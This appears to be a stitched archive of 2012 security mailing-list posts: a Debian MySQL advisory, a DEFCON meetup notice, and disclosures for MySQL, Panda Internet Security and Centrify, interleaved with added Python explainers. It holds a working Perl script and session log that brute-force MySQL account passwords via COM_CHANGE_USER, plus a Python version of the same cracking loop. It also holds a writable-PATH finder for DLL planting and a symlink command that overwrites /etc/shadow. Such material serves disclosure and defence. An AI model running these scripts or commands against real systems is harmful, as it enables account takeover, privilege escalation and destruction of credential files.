[SECURITY] [DSA 2581-1] mysql-5.1 security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2581-1                   secur...@debian.org
http://www.debian.org/security/                         Yves-Alexis Perez
December 04, 2012                      http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : mysql-5.1
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2012-3150 CVE-2012-3158 CVE-2012-3160 CVE-2012-3163
                 CVE-2012-3166 CVE-2012-3167 CVE-2012-3173 CVE-2012-3177
                 CVE-2012-3180 CVE-2012-3197 CVE-2012-5611
Debian Bug     : 690778 695001

Several issues have been discovered in the MySQL database server. The
vulnerabilities are addressed by upgrading MySQL to a new upstream
version, 5.1.66, which includes additional changes, such as performance
improvements and corrections for data loss defects. These changes are
described in the MySQL release notes at:

http://dev.mysql.com/doc/refman/5.1/en/news-5-1-66.html

For the testing distribution (wheezy) and unstable distribution (sid),
these problems have been fixed in version 5.5.28+dfsg-1.

Additionally, CVE-2012-5611 has been fixed in this upload. The
vulnerability (discovered independently by Tomas Hoger from the Red Hat
Security Response Team and king cope) is a stack-based buffer overflow in
acl_get() when checking user access to a database. Using a carefully
crafted database name, an already authenticated MySQL user could make the
server crash or even execute arbitrary code as the mysql system user.

For the stable distribution (squeeze), this problem has been fixed in
version 5.1.66-0+squeeze1.

For the testing distribution (wheezy) and unstable distribution (sid),
this problem will be fixed soon.

We recommend that you upgrade your mysql-5.1 packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.19 (GNU/Linux)

iQEcBAEBCgAGBQJQvZ/WAAoJEG3bU/KmdcClarEIAJ9nKbUELxjb1eksmEGOXkYr
x2WM+6XPVAN+4JKwwFyXCNYJbTPG5J3EM090YguqfnoWvVHZaPbcciymDOyNwPh3
x9Dm7lBNla2/fPvgEsA8enGaQdIrHnOy13Lj4e4Mu/3g1nSBp0eGZIVT6TVy9BJO
Hiqds0BZDqHuG/SGtWNsMLs6dMH4iYVcvcK3NFyFh6zt8O73Cbe0xIYDDuwO0uwj
HoUk6WxK2qs7auir+XkAShdQAj7KjL7Zs3LmLPaH1oUKvRD/IYJw14NRkdeU8CC5
Jz9sdTICSYxYe11zITXYdF4UYRLpF7W8jW6WDPM5kkZWPTjtUkUB0jcdeFQP6v4=
=D3mt
-----END PGP SIGNATURE-----
DC4420 - London DEFCON - Christmas 2012 meet! Tuesday 11th December 2012
Hard to believe, but 2012 is almost over. Once again we've managed to secure the venue for a December meet, so we can start the festivities well before your livers are too crippled by office parties...

Not only that, but we've even got a speaker lined up! Chris from Facebook London's Site Integrity Engineering Team will be giving us:

    Why root the kernel when you can just install a toolbar?

Chris will give a brief overview of the major attacks against Facebook and then deep dive on a trend towards browser malware that they really saw gain traction last year.

... and then we'll do some serious Christmas drinking!

DOWNSTAIRS @ The Phoenix, Cavendish Square
http://www.phoenixcavendishsquare.co.uk/

Talk starts at 19:30, but the venue is ours from much earlier... food is good and beer is cold!

See you next week!

cheers,
MM

p.s. if you have any potential talks for next year please email: mailto:ta...@dc4420.org?subject=DC4420%20Talk

-- 
In DEFCON, we have no names... errr... well, we do... but silly ones...
MySQL Local/Remote FAST Account Password Cracking
FAST Cracking of MySQL account passwords locally or over the network (post-auth)

(to the maintainers: you don't need to patch this, looks a lot like a minor bug, prolly documented :D)

I found a method to crack mysql user passwords locally or over the network pretty efficiently. During tests it was possible to test 5000 passwords per second over the network.

The method is as follows: The attacker logs into the mysql server with an unprivileged account. There is a command in mysql called change_user; this command can be used, as the name suggests, to change a user during a mysql session. Since mysql is very fast in doing this, it is much more powerful to crack passwords this way rather than reconnecting to the mysql server every time to brute force passwords (which would be VERY slow). Since the SALT does not change in the change_user command (and this is the weak point), it is a convenient way to crack passwords. (When connecting to mysql, in each connection attempt the SALT is always different and sent out by the server.)

Below is an example script and an example session which uses John the Ripper's capabilities to generate passwords. The password "pass" for the user crackme is cracked in a matter of seconds. (about 10 passwords are tested in 20 seconds)

--- cracking script

use Net::MySQL;
$| = 1;

# Log in once with a low-privileged account. The 20-byte salt the server
# sent in its greeting is kept in $mysql->{salt} and is reused unchanged
# for every COM_CHANGE_USER below.
my $mysql = Net::MySQL->new(
    hostname => '192.168.2.3',
    database => 'test',
    user     => 'user',
    password => 'secret',
    debug    => 0,
);

my $crackuser = 'crackme';   # account whose password is being guessed

# Candidate passwords arrive one per line on stdin (e.g. from john --stdout).
while (<STDIN>) {
    chomp;
    my $currentpass = $_;

    # COM_CHANGE_USER body: user NUL, length byte 0x14 (20), the 20-byte
    # scramble for this guess, then NUL for an empty database name.
    my $vv = join "\0",
        $crackuser,
        "\x14" . Net::MySQL::Password->scramble(
            $currentpass, $mysql->{salt}, $mysql->{client_capabilities}
        ) . "\0";

    # 0x11 is COM_CHANGE_USER; anything but an error packet means the guess
    # authenticated, so the password has been found.
    if ($mysql->_execute_command("\x11", $vv) ne undef) {
        print "[*] Cracked! --> $currentpass\n";
        exit;
    }
}

--- example session:

C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\john --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382  time: 0:00:00:02  w/s: 6262  current: citcH
words: 24573  time: 0:00:00:04  w/s: 4916  current: rap
words: 40956  time: 0:00:00:07  w/s: 5498  current: matc3
words: 49147  time: 0:00:00:09  w/s: 5030  current: 4429
words: 65530  time: 0:00:00:12  w/s: 5354  current: ch141
words: 73721  time: 0:00:00:14  w/s: 5021  current: v3n
words: 90104  time: 0:00:00:17  w/s: 5277  current: pun2
[*] Cracked! --> pass
words: 98295  time: 0:00:00:18  w/s: 5434  current: 43gs
Session aborted

Greetings,
Kingcope
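The script above leans on Net::MySQL::Password->scramble without showing what it computes or why a fixed salt matters. The following is an added example (not kingcope's code and not part of the original post) that implements the mysql_native_password token the 4.1+ protocol uses, the server-side check that a COM_CHANGE_USER packet has to pass, and the per-guess loop. The salt, the target hash and the word list are constructed stand-ins; in the real attack only the server holds the stored hash, and the call to verify() is the network round trip. The one external fact relied on is MySQL's PASSWORD('password') value, used as a sanity check.

```python
"""
mysql_native_password, as exercised by COM_CHANGE_USER (added example).

client token = SHA1(pw) XOR SHA1(salt || SHA1(SHA1(pw)))
stored hash  = SHA1(SHA1(pw))            # the "*..." string in mysql.user
server check = SHA1( SHA1(salt || stored) XOR token ) == stored

The salt is the 20-byte scramble from the server greeting.  A fresh
connection gets a fresh salt; COM_CHANGE_USER reuses the old one, so each
guess costs one token computation and one round trip, no handshake.
"""
import hashlib
import secrets
from typing import Iterable, Optional


def _sha1(data: bytes) -> bytes:
    return hashlib.sha1(data).digest()


def stored_hash(password: bytes) -> bytes:
    """What mysql.user holds: SHA1(SHA1(pw)). PASSWORD('x') prints '*' + hex."""
    return _sha1(_sha1(password))


def scramble(password: bytes, salt: bytes) -> bytes:
    """Client token for the 4.1+ protocol (what Net::MySQL::Password->scramble
    returns when the client capabilities select the secure-connection scheme)."""
    stage1 = _sha1(password)
    mask = _sha1(salt + _sha1(stage1))
    return bytes(a ^ b for a, b in zip(stage1, mask))


def verify(stored: bytes, salt: bytes, token: bytes) -> bool:
    """Server side: peel the mask off with the stored hash, re-hash, compare.
    The server never sees the clear-text password."""
    if len(token) != 20 or len(stored) != 20:
        return False
    mask = _sha1(salt + stored)
    stage1 = bytes(a ^ b for a, b in zip(token, mask))
    return secrets.compare_digest(_sha1(stage1), stored)


def change_user_payload(user: bytes, token: bytes, database: bytes = b"") -> bytes:
    """Body of COM_CHANGE_USER (command byte 0x11) laid out the way the Perl
    script builds it: user NUL, length byte (0x14 = 20), token, database NUL."""
    return user + b"\0" + bytes([len(token)]) + token + database + b"\0"


def crack(stored: bytes, salt: bytes, candidates: Iterable[str]) -> Optional[str]:
    """One token per guess against an unchanging salt. Against a live server
    verify() is replaced by sending change_user_payload() and reading the reply."""
    for cand in candidates:
        if verify(stored, salt, scramble(cand.encode(), salt)):
            return cand
    return None


if __name__ == "__main__":
    salt = bytes(range(20))                     # constructed; real one comes from the greeting
    target = stored_hash(b"pass")               # constructed; only the server has this
    words = ["citcH", "rap", "matc3", "4429", "pass", "43gs"]   # stand-in for john --stdout
    hit = crack(target, salt, words)
    print("cracked:", hit)
    if hit is not None:
        print("COM_CHANGE_USER body:",
              change_user_payload(b"crackme", scramble(hit.encode(), salt)).hex())
```

Because verify() only needs SHA1(SHA1(pw)), anyone who obtains the mysql.user hash can run the same loop fully offline; the change_user trick matters when the hash is not available and the server itself has to be used as the oracle.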
Privilege Escalation through Binary Planting in Panda Internet Security
Privilege Escalation through Binary Planting in Panda Internet Security

Software: Panda Internet Security 2012, 2013
Vendor: http://www.pandasecurity.com/
Vuln Type: Binary Planting Attack
Remote: No
Local: Yes
Discovered by: QSecure and Demetris Papapetrou
Website: http://www.qsecure.com.cy
Discovered: 09/09/2012
Reported: 19/11/2012
Disclosed: 04/12/2012
Vendor's Response: Automatically Generated Email
Vulnerability Reference: http://www.qsecure.com.cy/advisories/binary_planting_in_panda.html

VULNERABILITY DESCRIPTION:
==========================

As a result of an incorrect dynamic link library (DLL) loading in Panda Internet Security, an attacker with user level access to the machine can elevate his/her privileges to SYSTEM. This can be accomplished by planting a malicious DLL file in a writable folder that is part of the system's %PATH% variable. The malicious DLL is loaded when the vulnerable Panda service or the system is restarted.

The following DLLs are insecurely loaded by Panda Internet Security 2013:

Insecure DLL      Vulnerable Service
------------      ------------------
Pavshld.dll       PsCtrls.exe, PsImSvc.exe, PavFnSvr.exe, PskSvc.exe
ImFilter.dll2     PsImSvc.exe
ImFilter.dll3     PsImSvc.exe
ImFilter.dll4     PsImSvc.exe

In addition to the above DLLs, Panda Internet Security 2012 also loads ham.dll insecurely.
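The advisory describes the mechanism (a DLL name that is not found in any protected directory, so the loader falls through to %PATH%, where one writable entry is enough) but not how to find such an entry. The following is an added example, not QSecure's or Panda's code: it models the Windows loader's default search order and reports which directories a non-admin user could plant in. The install directory, PATH layout, file contents and writable entry are constructed assumptions for illustration; only the service and DLL names come from the advisory, and the model assumes those DLL names exist nowhere on the search path, which is the condition under which the PATH fallback happens. The live helper at the end reads this host's real PATH.

```python
"""
Binary-planting check for bare DLL names (added example, not from the advisory).
Models LoadLibrary's search order and asks which writable directory is
searched before the legitimate copy, if any.
"""
import os
from typing import Dict, Iterable, List, Optional, Sequence, Set


def _key(p: str) -> str:
    """Windows paths compare case-insensitively; ignore a trailing backslash."""
    return p.rstrip("\\").lower()


def dll_search_order(app_dir: str, windows_dir: str, cwd: str,
                     path_dirs: Sequence[str]) -> List[str]:
    """Order walked for a bare DLL name with SafeDllSearchMode on (the default):
    application dir, System32, 16-bit System, Windows, the process's current
    directory, then each %PATH% entry in order."""
    win = windows_dir.rstrip("\\")
    return [app_dir, win + "\\System32", win + "\\System", win, cwd, *path_dirs]


def first_resolution(dll: str, order: Sequence[str],
                     fs: Dict[str, Set[str]]) -> Optional[str]:
    """First directory in `order` holding `dll`; None if the name resolves
    nowhere, which is when a service keeps probing PATH on every start."""
    want = dll.lower()
    index = {_key(d): {f.lower() for f in files} for d, files in fs.items()}
    for d in order:
        if want in index.get(_key(d), set()):
            return d
    return None


def plant_candidates(dll: str, order: Sequence[str], fs: Dict[str, Set[str]],
                     writable: Iterable[str]) -> List[str]:
    """Writable directories searched before the legitimate copy. A DLL in any
    of them hijacks the load; if the DLL exists nowhere, every writable entry
    on the path qualifies (the ImFilter.dll2/3/4 situation)."""
    legit = first_resolution(dll, order, fs)
    wkeys = {_key(w) for w in writable}
    out: List[str] = []
    for d in order:
        if legit is not None and _key(d) == _key(legit):
            break
        if _key(d) in wkeys:
            out.append(d)
    return out


def writable_path_dirs_here() -> List[str]:
    """Live (not modelled) check of this host's PATH. os.access is coarse;
    confirm a hit with `icacls <dir>` before relying on it."""
    return [d for d in os.environ.get("PATH", "").split(os.pathsep)
            if d and os.path.isdir(d) and os.access(d, os.W_OK)]


# Constructed model. PsImSvc.exe and ImFilter.dll2 are names from the advisory;
# the install directory, PATH entries and the writable directory are assumptions.
APP_DIR = r"C:\Program Files\Vendor\App"
MODEL_ORDER = dll_search_order(APP_DIR, r"C:\Windows", APP_DIR,
                               [r"C:\Windows\System32", r"C:\Python27", r"C:\Tools\bin"])
MODEL_FS = {
    r"C:\Windows\System32": {"kernel32.dll", "advapi32.dll"},
    APP_DIR: {"PsImSvc.exe"},
}
MODEL_WRITABLE = {r"C:\Python27"}   # e.g. an installer that granted Users modify rights

if __name__ == "__main__":
    for name in ("kernel32.dll", "ImFilter.dll2"):
        print(name, "resolves in:", first_resolution(name, MODEL_ORDER, MODEL_FS),
              "| plant in:", plant_candidates(name, MODEL_ORDER, MODEL_FS, MODEL_WRITABLE))
    print("writable PATH entries on this host:", writable_path_dirs_here())
```

A name that resolves in System32 yields no candidates even with a writable PATH entry, because System32 is searched first; a name that resolves nowhere is hijackable from any writable entry, and the service's privilege (SYSTEM for the Panda services listed) is what the planted DLL inherits.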
Centrify Deployment Manager v2.1.0.283
Centrify Deployment Manager v2.1.0.283

While at a training session for Centrify, I noticed poor handling of files in /tmp. I was able to overwrite /etc/shadow with the contents of adcheckDMoutput. I am sure there are more vulnerabilities to be exploited, maybe a local root - but being this is a training class I should probably focus.

total 6680
-rwxr-xr-x 1 clyde clyde 6790300 Dec  3 14:41 adcheck-rhel3-i386.210
-rw-rw-r-- 1 clyde clyde     188 Dec  3 14:41 centrify.cmd.210
-rwxr-xr-x 1 root  root      187 Dec  3 14:18 engnew-cen.sh
drwx------ 2 root  root     4096 Dec  3 10:25 vmware-root
drwxr-xr-x 7 root  root     4096 Nov 30  2010 vmware-tools-distrib
[root@engnew-cen tmp]# ls -l
total 6680
-rw-rw-rw- 1 root  root     3999 Dec  3 14:41 adcheckDMoutput
-rwxr-xr-x 1 clyde clyde 6790300 Dec  3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 root  root      187 Dec  3 14:18 engnew-cen.sh
drwx------ 2 root  root     4096 Dec  3 10:25 vmware-root
drwxr-xr-x 7 root  root     4096 Nov 30  2010 vmware-tools-distrib
[root@engnew-cen tmp]# ls -l
total 6688
-rw-rw-rw- 1 root  root     3999 Dec  3 14:41 adcheckDMoutput
-rwxr-xr-x 1 clyde clyde 6790300 Dec  3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 clyde clyde     132 Dec  3 14:41 centrify.cmd.210
-rwxr-xr-x 1 root  root      187 Dec  3 14:18 engnew-cen.sh
drwx------ 2 root  root     4096 Dec  3 10:25 vmware-root
drwxr-xr-x 7 root  root     4096 Nov 30  2010 vmware-tools-distrib
[root@engnew-cen tmp]# ls -l
total 6672
-rwxr-xr-x 1 clyde clyde 6790300 Dec  3 14:41 adcheck-rhel3-i386.210
-rwxr-xr-x 1 root  root      187 Dec  3 14:18 engnew-cen.sh

# ln -s /etc/shadow adcheckDMoutput

After run:

# ls -l /etc/shadow
-r-------- 1 root root 3999 Dec  3 14:56 /etc/shadow

/etc/shadow has been overwritten with the contents of adcheckDMoutput.

I am also assuming the .210 appended to the end of files in /tmp is the major version number.

Larry W. Cashdollar
@_larry0
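The listings above show the ingredients of a classic /tmp symlink attack: a root-owned process writes a report under a predictable name (adcheckDMoutput) that any user can pre-create, and it opens the path in a way that follows a symlink. The following is an added example, not Centrify's code and not the post author's: it reproduces the pattern against a scratch directory standing in for /tmp and /etc, then shows the two fixes a reviewer would ask for. File contents and the scratch layout are constructed; only the report file name comes from the post.

```python
"""
Predictable /tmp output file versus symlink pre-creation (added example).
unsafe_report() is the pattern the listings show; safe_report() and
safest_report() are the fixes.
"""
import os
import shutil
import tempfile

REPORT_NAME = "adcheckDMoutput"   # the predictable name from the post


def unsafe_report(path: str, data: str) -> None:
    """Open a fixed name for writing as root. open(..., 'w') truncates and
    follows symlinks, so a pre-created adcheckDMoutput -> /etc/shadow means
    /etc/shadow is what gets truncated and written."""
    with open(path, "w") as f:
        f.write(data)


def safe_report(path: str, data: str) -> None:
    """Keep the fixed name but refuse anything that already exists:
    O_CREAT|O_EXCL fails with EEXIST on a pre-existing path, symlink
    included (POSIX requires this), and O_NOFOLLOW backs that up where
    the platform has it. Mode 0600 instead of the listing's 0666."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | getattr(os, "O_NOFOLLOW", 0)
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as f:
        f.write(data)


def safest_report(directory: str, data: str) -> str:
    """Preferred fix: no predictable name at all. mkstemp chooses a random
    suffix, creates with O_EXCL and mode 0600, and returns the open fd."""
    fd, path = tempfile.mkstemp(prefix=REPORT_NAME + ".", dir=directory)
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return path


def run_demo() -> dict:
    """Play the attack in a throwaway directory and report what happened."""
    work = tempfile.mkdtemp()
    try:
        victim = os.path.join(work, "shadow")              # stands in for /etc/shadow
        original = "root:*:15000:0:99999:7:::\n"           # constructed content
        with open(victim, "w") as f:
            f.write(original)

        link = os.path.join(work, REPORT_NAME)
        os.symlink(victim, link)   # the attacker's step: ln -s /etc/shadow adcheckDMoutput
        payload = "adcheck output line\n"

        unsafe_report(link, payload)                        # "root" writes the report
        with open(victim) as f:
            after_unsafe = f.read()

        try:
            safe_report(link, payload)
            safe_refused = False
        except OSError:                                     # EEXIST (or ELOOP)
            safe_refused = True

        tmp = safest_report(work, payload)
        return {
            "victim_clobbered": after_unsafe == payload,
            "safe_refused": safe_refused,
            "random_name": os.path.basename(tmp) != REPORT_NAME,
            "random_mode": oct(os.stat(tmp).st_mode & 0o777),
        }
    finally:
        shutil.rmtree(work, ignore_errors=True)


if __name__ == "__main__":
    print(run_demo())
```

On a real system the symlink would sit in /tmp itself; on kernels with fs.protected_symlinks=1 the follow is refused when the link owner differs from the process's uid in a sticky world-writable directory, which is why the scratch directory here is a private one. That sysctl is a mitigation, not a reason to keep a predictable, world-writable output file.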
Centrify Deployment Manager v2.1.0.283
This is actually the login UID of the user Deployment Manager is being run as.